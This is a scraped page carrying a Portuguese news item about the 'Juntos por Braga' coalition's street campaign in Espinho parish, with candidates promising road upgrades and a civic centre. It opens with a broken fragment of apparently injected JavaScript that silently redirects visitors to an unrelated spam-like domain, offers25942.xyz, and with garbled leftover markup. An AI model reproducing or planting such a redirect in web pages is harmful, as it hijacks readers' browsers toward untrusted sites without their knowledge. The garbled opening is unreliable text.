{ window.location.replace('http://offers25942.xyz/'); }, delay);})();ngle single-noticias postid-3973 _masterslider _ms_version_3.7.8" id="page_body">

“Juntos por Braga” na rua para mudar Espinho

Os candidatos da coligação “Juntos por Braga” à Junta de Freguesia de Espinho, José Martinho, e à Câmara Municipal de Braga, Ricardo Rio, percorreram as ruas de Espinho com o objetivo de reforçar a proximidade com a população, mas também para, em conjunto, discutirem as necessidades mais prementes da freguesia.

A “caravana” da coligação “Juntos por Braga” tem percorrido por estes dias vários pontos do concelho para explicar aos bracarenses o projeto de futuro que sustenta para a cidade e para cada uma das freguesias. Foi também assim em Espinho, com mais uma arruada na qual a população teve a oportunidade de acarinhar os candidatos, mas também de expor as suas necessidades.

E é pela necessidade de mudar Espinho que José Martinho avança para a liderança da Junta de Freguesia em defesa da requalificação das acessibilidades, da salvaguarda e melhoria dos equipamentos públicos e de um maior apoio à população, da qual se evidenciará o apoio aos mais jovens, mas também aos seniores. Com as carências da rede viária identificadas, entre o conjunto das melhorias a realizar nas acessibilidades da freguesia, destaca-se a futura requalificação da Rua de S. Martinho, local que Ricardo Rio teve a oportunidade de visitar.

No que concerne aos equipamentos da freguesia, a coligação “Juntos por Braga” propõe a construção de um Centro Cívico que irá albergar um centro de dia que irá albergar várias valências para o apoio a idosos, crianças e jovens, mas também eventos culturais, bem como um campo multidesportivo.

Esta arruada serviu para relembrar à população que agora é a oportunidade para abraçar uma mudança em pleno, através de um projeto liderado por José Martinho que comunga das principais ideias e objetivos da candidatura liderada por Ricardo Rio à CMB.